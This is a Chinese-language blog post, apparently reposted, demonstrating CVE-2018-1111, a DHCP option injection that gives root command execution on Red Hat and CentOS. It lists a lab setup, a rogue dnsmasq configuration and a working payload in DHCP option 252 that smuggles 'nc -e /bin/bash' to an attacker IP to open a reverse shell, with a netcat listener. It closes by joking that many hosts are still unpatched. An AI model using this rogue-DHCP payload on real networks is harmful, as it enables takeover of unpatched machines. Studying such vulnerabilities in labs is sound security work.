CVE-2018-1111 劫持dhcp造成Redhat、centos代碼執行


原文地址:https://www.o2oxy.cn/975.html

前言: 看到crazy 老哥說有一個好新的漏洞。可以在redhat 和centos 執行任意代碼 、 我說這就很有意思了。晚上來看看

他分享了一下他寫的博客。看了下。進入tools 看了下這個文章,仔細的看了下, 很有意思。有意思

漏洞概述
通過偽造DHCP服務器發送響應包,攻擊紅帽系統,獲取root權限並執行任意命令。

影響:

測試了一下 centos6 和centos7 都受到這個影響

 

利用的整個過程:

宿主機環境:Windows 10 企業版  
虛擬機環境:VMware Workstation

攻擊者:Kali linux
受害者:centos7

  • 1. 兩台虛擬機的網絡適配器都需要設置為 僅主機模式
  • 2. 停用主機模式的DHCP服務

 

首先將兩個虛擬機設置成僅主機模式,關閉dhcp功能。

 

kali設置成靜態地址,要和下文中的conf中的地址相同,網關也是本機ip。這里我設置成192.168.71.5

root@kali:~# route add default gw 192.168.71.5

kali創建個dnsmasp.conf內容如下:

bind-interfaces 
interface=eth0 
except-interface=lo 
dhcp-range=192.168.75.10,192.168.75.20,12h 
dhcp-option=3,192.168.71.5
dhcp-option=6,192.168.71.5
log-queries 
log-facility=/var/log/dnsmasq.log

 開啟dnsmasp:

dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash 192.168.71.5 6666 #"

nc偵聽6666端口

nc -l -p 6666 -v

kali 這邊已經完成了

現在centos重啟一下網卡!

 

已經顯示獲取到了IP 了 看看kali 這邊的情況吧

 

 寫了一個文件。在centos 里面查看一下

總結:

漏洞原理應該是使用了單引號導致了參數被執行。

**--dhcp-option="252,malayke'&nc -e /bin/bash 192.168.182.130 6666 #"**

現在應該還有很多主機是沒有補丁的。。可以去 …. hhhhhhh


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM